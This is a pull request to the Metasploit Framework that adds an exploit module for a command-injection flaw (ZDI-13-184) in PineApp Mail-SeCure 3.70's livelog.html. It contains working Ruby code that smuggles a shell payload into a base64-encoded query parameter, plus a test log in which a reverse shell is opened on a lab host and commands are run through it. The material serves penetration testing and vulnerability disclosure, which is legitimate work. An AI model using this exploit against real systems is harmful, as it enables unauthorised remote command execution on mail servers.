### PR TITLE
Add module for ZDI-13-184

### DIFF
--- a/modules/exploits/linux/http/pineapp_livelog_exec.rb
+++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb
@@ -1,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PineApp Mail-SeCure livelog.html Arbitrary Command Execution',
+			'Description'    => %q{
+					This module exploits a command injection vulnerability on PineApp Mail-SeCure
+				3.70. The vulnerability exists on the livelog.html component, due to the insecure
+				usage of the shell_exec() php function. This module has been tested successfully
+				on PineApp Mail-SeCure 3.70.
+			},
+			'Author'         =>
+				[
+					'Unknown',     # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-184/']
+				],
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl python telnet'
+						}
+				},
+			'Targets'        =>
+				[
+					[ 'PineApp Mail-SeCure 3.70', { }]
+				],
+			'DefaultOptions' =>
+				{
+					'SSL' => true
+				},
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jul 26 2013'
+			))
+
+		register_options(
+			[
+				Opt::RPORT(7443)
+			],
+			self.class
+		)
+
+	end
+
+	def my_uri
+		return normalize_uri("/livelog.html")
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri' => my_uri,
+			'vars_get' => {
+				'cmd' =>'nslookup',
+				'nstype' => Rex::Text.encode_base64("A"),
+				'hostip' => Rex::Text.encode_base64("127.0.0.1"), # Using 127.0.0.1 in order to accelerate things with the legit command
+				'nsserver' => Rex::Text.encode_base64("127.0.0.1")
+			}
+		})
+		if res and res.code == 200 and res.body =~ /NS Query result for 127.0.0.1/
+			return Exploit::CheckCode::Appears
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		print_status("#{rhost}:#{rport} - Executing payload...")
+		send_request_cgi({
+			'uri' => my_uri,
+			'vars_get' => {
+				'cmd' =>'nslookup',
+				'nstype' => Rex::Text.encode_base64("A"),
+				'hostip' => Rex::Text.encode_base64("127.0.0.1"), # Using 127.0.0.1 in order to accelerate things with the legit command
+				'nsserver' => Rex::Text.encode_base64("127.0.0.1;#{payload.encoded}")
+			}
+		})
+	end
+
+end


### PR DESCRIPTION
Tested successfully with PineApp Mail-SeCure 3.70

Like this one because the vulnerable component expects the data to be base64 encoded (including the payload :))

I think with this one the "exploit pack" for the PineApp application is sufficient. If any of you think worth to code modules for the others PineApp vulnerabilities published by ZDI let me know and I can work on it.

Test result:

```
msf exploit(pineapp_livelog_exec) > reload
[*] Reloading module...
check
msf exploit(pineapp_livelog_exec) > check
[*] The target appears to be vulnerable.
msf exploit(pineapp_livelog_exec) > exploit

[*] 192.168.24.24:7443 - Executing payload...
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo X5ahgBPcgIkOoKSg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nX5ahgBPcgIkOoKSg\r\n"
[*] Matching...
[*] B is input...
i[*] Command shell session 4 opened (192.168.24.21:4444 -> 192.168.24.24:34395) at 2013-07-28 09:56:25 -0500
d

uid=1005(qmailq) gid=102(qmail) groups=102(qmail)
ls
admin
blocking.php
cgi-bin
download.php
downloads
en.php
ie.css
images
index.html
ize
js.js
livelog.html
palogin
pineapp_logo.jpeg
^C
Abort session 4? [y/N]  y
```
